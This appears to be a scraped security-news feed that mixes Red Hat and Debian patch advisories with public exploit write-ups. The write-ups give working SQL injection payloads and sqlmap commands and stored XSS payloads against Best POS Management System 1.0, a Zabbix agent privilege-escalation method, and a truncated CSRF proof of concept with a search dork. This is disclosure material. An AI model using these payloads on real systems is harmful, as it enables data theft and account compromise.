Red Hat Security Advisory 2023-0802-01 - An update is now available for Red Hat OpenShift GitOps 1.6. Red Hat Product Security has rated this update as having a security impact of Important.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2023:0802-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0802  
Issue date:        2023-02-17  
CVE Names:         CVE-2021-4238 CVE-2022-3064 CVE-2022-23521   
                   CVE-2022-40303 CVE-2022-40304 CVE-2022-41903   
                   CVE-2022-47629 CVE-2023-23947   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.6.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

* go-yaml: Improve heuristics preventing CPU/memory abuse by parsing  
malicious or large YAML documents (CVE-2022-3064)

* ArgoCD: Users with any cluster secret update access may update  
out-of-bounds cluster secrets (CVE-2023-23947)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be  
2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents  
2167819 - CVE-2023-23947 ArgoCD: Users with any cluster secret update access may update out-of-bounds cluster secrets

5. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-3064  
https://access.redhat.com/security/cve/CVE-2022-23521  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41903  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-23947  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+8eodzjgjWX9erEAQiIAA/+I+GY4bNl8KuWG7hEexFE6cWGefdcuFVM  
anuKJz6zyFyrZZD/oYURY2onVYJokqLQ63jkE4zNY3xOzp2uploxji2/Y62on4sw  
5KRNcIXHCr14e4GQVpQhP0UH0qsYgnf4Bep5MoI7/6+rN8S0fqnQPH+vlF6V2/z/  
PlHT+SOG1xHFDRcM/Zq4LtGmObUvgnk9VbTw7pFept8K/QXDbcG6NbuBNVJx/+Xo  
NYMzwOHaL/XVifkv+GZIdnY/Z+Pm7DyihzXQaIEu4Soqeq3SHJhxp6f7fk6dlRBA  
K95rIPKtCo3eMjruUbMfahqC88cXppfrexh8IETpWRuioMv22YR7y1D9UCKeh2yO  
OLcBm9aWy2MRPBK8itI3ZkvAk+oq4ngYHOVUqIdFbqGXIM9qixFhVyXaOYcFW+6D  
wJnnvGoR5T9bMrzVCgpT1zWmtuJjlyx27Pt195rA5LCxmw7v7q0MkP8JT7rieFKi  
Ot3JIWPvNyVerzPFE//a4WkRxTNmMJDmV6g4n2JtVAOh+dB4vQ6IdQVYjLng50gw  
Nv0Xv3HHisQaAsjiJDXes99Uf7ZSfLtFv4QX9x1pdc5wDZeW171M2G7/9eqAdnNi  
a5j0cIox/krqiRD01ZdZxwUezxtB1Uyag8207ffcvQKnXThBTS2UCzNCNpxsiyQ1  
i3ClqitT2BM=  
=mGzi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0802-01

Best POS Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 14/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA```GET /kruxton/billing/index.php?id=9 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://localhost/kruxton/index.php?page=ordersCookie: PHPSESSID=61ubuj4m01jk5tibc7banpldaoUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```# PayloadGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 58HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=9 AND 4017=4017    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=9 OR (SELECT 7313 FROM(SELECTCOUNT(*),CONCAT(0x7162767171,(SELECT(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: id=-9498 UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL------[19:33:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)```----------------------------# Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA_________python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"--dbms=mysql --level 3 --risk 3 --dbs --fresh-queriesURI parameter '#1*' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52HTTP(s) requests:---Parameter: #1* (URI)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM(SELECT(SLEEP(5)))zHgC)    Type: UNION query    Title: Generic UNION query (NULL) - 5 columns    Payload: http://localhost:80/kruxton/manage_user.php?id=-1830<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECTNULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL------[10:58:18] [INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Best POS Management System 1.0 SQL Injection

Best POS Management System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 14/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

# Description

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/index.php?page=add-category"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_category HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------7128987773293048653857517  
Content-Length: 442  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-category  
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="id"

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="name"

XSSPOC"><img src=x onerror=prompt(document.domain);>  
-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="description"

This is POC  
-----------------------------7128987773293048653857517--  
```

--------------------------------------

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 17/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/ajax.php?action=save_product"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

on description <img src=x onerror=prompt(2);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_product HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------11015616619250686693182759357  
Content-Length: 830  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-product  
Cookie: PHPSESSID=<COOKIE>  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="id"

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="category_id"

3'  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="name"

XSSPOC2"><img src=x onerror=prompt(document.domain);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="description"

XSSPOC2"><img src=x onerror=prompt(2);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="price"

1122  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="status"

1  
-----------------------------11015616619250686693182759357--

```

Best POS Management System 1.0 Cross Site Scripting

Zabbix Agent and Zabbix Agent 2 versions 6.2.7 and below suffer from an issue where it does not secure the permissions on a non-default installation directory, allowing an attacker to place a malicious executable to escalate privileges.

    # Exploit Title: Zabbix agents - Insecure Permissions on non-default installation directory location# Discovery by: mmg# Discovery Date: 2023-01-23# Vendor Homepage: https://www.zabbix.com/download_agents# Software Link Zabbix agent : https://cdn.zabbix.com/zabbix/binaries/stable/6.2/6.2.7/zabbix_agent-6.2.7-windows-amd64-openssl.msi# Software Link Zabbix agent 2 : https://cdn.zabbix.com/zabbix/binaries/stable/6.2/6.2.7/zabbix_agent2-6.2.7-windows-amd64-openssl.msi# Tested Version: Zabbix agent and Zabbix agent 2 (v6.2.6, v6.2.7 and older versions)# Vulnerability Type: Local Privilege Escalation# Tested on OS: Windows 10 Pro Version 22H2 (OS Build 19045.2486) x64 version# CVSSv3 Vectors : https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H# CVE N/A# Step to discover:Go to Start and type powershell.Enter the following command and press Enter:Get-WmiObject win32_service | ?{ $_.Name -like '*zabbix*' -and $_.Pathname -notlike "*C:\Program Files*"}| select Name,PathName# Example of a vulnerable installationName           PathName----           --------Zabbix Agent   "C:\Software\Zabbix Agent\zabbix_agentd.exe" --config "C:\Software\Zabbix Agent\zabbix_agentd.conf"Zabbix Agent 2 "D:\software\Zabbix Agent 2\zabbix_agent2.exe" -c "D:\software\Zabbix Agent 2\zabbix_agent2.conf" -f=false# Exploit:A vulnerability was found in Zabbix Agents on non-default installation directory location. The Zabbix Agent executables have incorrect permissions, allowing a local unprivileged user to replace itwith a malicious file that will be executed with "LocalSystem" privileges which will result in completecompromise of Confidentiality, Integrity and Availability.# TimelineJan 23, 2023 - Reported to ZabbixFeb 1, 2023  - Zabbix does not consider this a vulnerabilityFeb 6, 2023  - Requested official approval to disclose itFeb 8, 2023  - Zabbix agrees with public disclosureFeb 13, 2023 - Public disclosure

Zabbix Agent 6.2.7 Insecure Permissions / Privilege Escalation

Red Hat Security Advisory 2023-0728-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.3.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.12.3 security update  
Advisory ID:       RHSA-2023:0728-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0728  
Issue date:        2023-02-16  
CVE Names:         CVE-2021-4238 CVE-2022-41717   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.12.3 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.12.3. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:0727

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

      The sha values for the release are

      (For x86_64 architecture)  
The image digest is  
sha256:382f271581b9b907484d552bd145e9a5678e9366330059d31b007f4445d99e36

      (For s390x architecture)  
The image digest is  
sha256:529e7aa3a821892575abeecd4971dff194f48943ce364a01d93c599c27d2ef9c

      (For ppc64le architecture)  
The image digest is  
sha256:8db6cb445bdf1534860a1a47f8c50bc73d99dfdd196f06184acbcea5d7bc112f

      (For aarch64 architecture)  
The image digest is  
sha256:4657924fc2720f48932dec10380428804e9d82194f8ac748b7329f7c18021ef8

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-213 - base image quay.io/operator-framework/ansible-operator. After moving to tag v1.20.0, it breaks the task to update k8s_status in an FIPS enabled cluster   
OCPBUGS-2210 - ZTP with converged flow is too slow  
OCPBUGS-298 - Make ovnkube-trace work on hypershift deployments  
OCPBUGS-3095 - IPI for Power VS: Deploy fails when there is are certain preexisting resources  
OCPBUGS-3399 - ovn-k behaviour for service CIDR that doesn't match existing svc ip+port  
OCPBUGS-3941 - Whereabouts CNI timesout while iterating exclude range [backport 4.12]  
OCPBUGS-4238 - Hosted ovnkubernetes pods are not being spread among workers evenly  
OCPBUGS-4281 - Metrics are not available when running console in development mode  
OCPBUGS-4862 - Deletion of BYOH Windows node hangs in Ready,SchedulingDisabled  
OCPBUGS-5093 - After entering valid git repo url on Import from git page, throwing warning message instead Validated  
OCPBUGS-5841 - [4.12] Modifying node_mgmt_port_netdev_flags on OVN-K node will crash  
OCPBUGS-5960 - [4.12] Bootimage bump tracker  
OCPBUGS-5996 - [vsphere] installation errors out when missing topology in a failure domain  
OCPBUGS-6066 - Released operator versions are disappearing  
OCPBUGS-6076 - AMQ reconnect for 7 minutes  floods linuxptp daemon with socket connection error  
OCPBUGS-6085 - Editing Pipeline in the ocp console to get information error  
OCPBUGS-6494 - One old machine stuck in Deleting and many co get degraded when doing master replacement on the cluster with OVN network  
OCPBUGS-6669 - Do not show UpdateInProgress when status is Failing  
OCPBUGS-6703 - oc-mirror heads-only does not work with target name  
OCPBUGS-6758 - `create a project` link not backed by RBAC check  
OCPBUGS-6764 - Add Git Repository form shows empty permission content and non-working help link until a git url is entered  
OCPBUGS-6766 - "Delete dependent objects of this resource" might cause confusions  
OCPBUGS-6805 - MCO reconcile fails if user replace the pull secret to empty one  
OCPBUGS-6823 - [release-4.12] Egress FW ACL rules are invalid in dualstack mode  
OCPBUGS-6850 - admin ack test nondeterministically does a check post-upgrade  
OCPBUGS-6913 - PipelineRun task status overlaps status text  
OCPBUGS-6928 - Update OWNERS_ALIASES in release-4.12 branch  
OCPBUGS-6969 - User Preferences - Applications : Resource type drop-down i18n misses  
OCPBUGS-6997 - Update 4.12 ose-machine-config-operator image to be consistent with ART  
OCPBUGS-7025 - Bundle Unpacker Using "Always" ImagePullPolicy for digests  
OCPBUGS-7103 - Agent ISO does not respect proxy settings

6. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+7KQtzjgjWX9erEAQiMxRAAhNd1a5zjOKI7HsdHjAAnON9zEuxOn1tn  
VW+fAYkyUgQRIrTrXyabzAgf4mJmy6YeKxYJiWCDmQGAkfTZb9QvfHm8rJQCJ4Zk  
lI6aVAlkouPHk5HAY10yV1rPmRPeWviycfljtPZ+fXrR7KDY61JWEt/VFN8F/zt8  
cJ1uM7NmOUndLDfttHlEj2a35a6iBJxAtTJ9e2/s+3HqTNiiQzT9ghkeyJnUUglB  
g5aHttjkL6blxnIjeeSytUCmRS0CpqMAUdyfQft2zLM0vN58JPChy/t14acEaKQ/  
+MqVRtjPI6NtmLWu6WCwuhMqU0BLFVKp8nk7Ue1tvnyC/egBpD9mjM9sxD5SrRg1  
wFMXgQ17tioPdValyakjxc3+I9GdNu6mKD7AaqKIlZxmFZoR5kCH3pykuw2Pcx9i  
/4b2iLc4USyMJSAssuoLhljS/3jli5VZRLSm2LEOCchAjo1nES1nUh6d2ePcH9YP  
s/E+x4Li3EML+tAxiqgr4KeI5fwg7nDdP5hvltFgVdD1y+D2JrCz+7vhmSnSPej+  
AbwM5n+T5IkiQRGwnFf5KUqSpGPd3IvVLinCKPWEkYRezGhbUzAhc3V5PvtR0Tl2  
Tao8dMVBvvttlLf5jcvJaiw3VBdOcOIHx5JJSUiZ6HomMGBYva8Gfj4F57WnnEK2  
PbL5ln8DF7w=  
=LpVM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0728-01

Debian Linux Security Advisory 5351-1 - An anonymous researcher discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5351-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
February 17, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-23529

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-23529

    An anonymous researcher discovered that processing maliciously  
    crafted web content may lead to arbitrary code execution. Apple is  
    aware of a report that this issue may have been actively  
    exploited.

For the stable distribution (bullseye), this problem has been fixed in  
version 2.38.5-1~deb11u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmPut+cACgkQAAyEYu0C  
2AJaFhAAkyJJj40wLK3T0Zleue2oSvGe5fujMsGtiiUXCn8L6x4nGnk0tPDsIPsD  
jssAEH6sSFrQkpuDV/MUYK6EXsRG8js4HFql8M9A0xdGihT35mih7YSrhd2cMmBU  
VJS8DMuVefOhukGdgubydfUhCpN4v9YmlmNo+bURl6GRtNBJfm9bWvtx9i1CANMQ  
rhbMIXuzrbx7j8PAfbTA8YclFpiLhsq+aEjb7UeOr6ZPeNfMcIisZrJI2cfpcDFH  
JpA6yECLXnuOqMWn4xUN+f8kmUwDLlSpnZ6qA9+jeOC5O2ljKB2k75D/C2547o8Z  
km5ihSNafLDsVXsy3DSU0XZiLxLpAEmR3TqsC30k196frajVt1cQKWdvI9yUj+oZ  
YePgbmXlz+Ua1pgoaD8IuJiAwvQw7ZYen6xVKSX1Gu2+5NWTB5cw3sOcTLeCTSzh  
IZlS8Gdf0dbyN9nWF2jKv9LeGKfGHs6WzEcx9FZDLjZ0B96uYcbVLNopp9SVYgTX  
sqYwDTAqjbLTegGbLxGkXXqqvKsPiAEDHdhdBOHmefQjLvThMvwxciRAx0P76Rsa  
s3kxIlsOgdnlZ/ecA1vS0Xa+xK4r19eGveJU2dfQ80DdqeeNTNNhkfUjwzPaYlEX  
b2Irr6UDv2JYmzIZ5qtJgCOA7yX1lbIOTj5/S11K0gIdp4HTyao=  
=URao  
-----END PGP SIGNATURE-----

Debian Security Advisory 5351-1

Red Hat Security Advisory 2023-0727-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.3.

Red Hat Security Advisory 2023-0727-01

Red Hat Security Advisory 2023-0577-01 - This release of Red Hat build of Eclipse Vert.x 4.3.7 GA includes security updates. For more information, see the release notes listed in the References section. Issues addressed include a denial of service vulnerability.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256=====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: Red Hat build of Eclipse Vert.x 4.3.7 security updateAdvisory ID:       RHSA-2023:0577-01Product:           Red Hat OpenShift Application RuntimesAdvisory URL:      https://access.redhat.com/errata/RHSA-2023:0577Issue date:        2023-02-16CVE Names:         CVE-2022-41854 CVE-2022-41881 =====================================================================1. Summary:An update is now available for Red Hat build of Eclipse Vert.x.Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability. Formore information, see the CVE pages listed in the References section.2. Description:This release of Red Hat build of Eclipse Vert.x 4.3.7 GA includes securityupdates. For more information, see the release notes listed in theReferences section.Security Fix(es):* codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS(CVE-2022-41881)* dev-java-snakeyaml: dev-java/snakeyaml: DoS via stack overflow(CVE-2022-41854)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgements, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying the update, back up your existing installation, includingall applications, configuration files, databases and database settings, andso on.The References section of this erratum contains a download link for theupdate. You must be logged in to download the update.4. Bugs fixed (https://bugzilla.redhat.com/):2151988 - CVE-2022-41854 dev-java/snakeyaml: DoS via stack overflow2153379 - CVE-2022-41881 codec-haproxy: HAProxyMessageDecoder Stack Exhaustion DoS5. References:https://access.redhat.com/security/cve/CVE-2022-41854https://access.redhat.com/security/cve/CVE-2022-41881https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=catRhoar.eclipse.vertx&version=4.3.7https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.3/html/release_notes_for_eclipse_vert.x_4.3/index6. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2023 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBY+514NzjgjWX9erEAQiXsA//R2iUqv8p0cLhsqlXZhX8fnWgGyHT5YI/ECvfslAn+5JB/HaeZNYQpovrHadLuWU1ZWjWunbd7ioaknY/SnQXww+L+FFFVfFOa57J1okP7N8/aDzXCJmQ64lDr65j5kUwv8UPyryOe0GZH0SU9WErRAULf+Q/48wAQVl6C2rEBlhy195kH1waCuCls0BD7x3IcrmrpbCFfiIQtDcpW7SRlk691vVamzRlCHj/aWr2WWpBEG10ic6NOUjSlosfZqvMJ4deIaU+xPc+ovAwiVzoxoT7YB7wE4+N61pwpABTP2sxI2wDHtbS5C0LkEDWtvTvaVEd8CT9SYNhOI4EcN5waHzXFzRxZ4LOu92q7niL/Ao5jjHqHMbFdWfClXandpBiV54EtQuht1IHwYm/jHLDFQKoIbuO0CAjY4q6gLG/+N63gEBy5Wlpikuqy5vWW+ftCD4r32cix/dOP342NBRwhT+dZ5e3+iWXUDziXhv8a8Z4PxJOPeD7liSER8yhBU/6mxrljBBUVg7/hQCbq+2OQ33vvIaalma18MI9Oej13h/iNxYC2244Sp3EupImmwUjXOiUHyElz5QjhXe/u7qB9QQ/sDky8BL2B/3F8EnPKOUjQt+/xqCPdHXINJsLYBAGXHx/Iz6jVxg3ERFHyPW5EXR6yboIp0vAfebL5QRld3U==iFMn-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0577-01

Demanzo Matrimony version 1.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Demanzo Matrimony v.1.5 CSRF Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit)                                            |   
| # Vendor    : https://demanzo.com/matrimony-site-development/                                                                    |    
| # Dork      : Powered by ITAcumens or "Powered by Demanzo"                                                                       |  
====================================================================================================================================

poc :

[+] infected file: add-staff.php

[+] Inside folder /admin/add-staff.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

</div>  
                       <form action="https://www.example/web/html/admin/add-staff.php" method="POST">  
            <div id="msg">  
                          <div class="form-group ban_btm1 col-md-6 no_pad">  
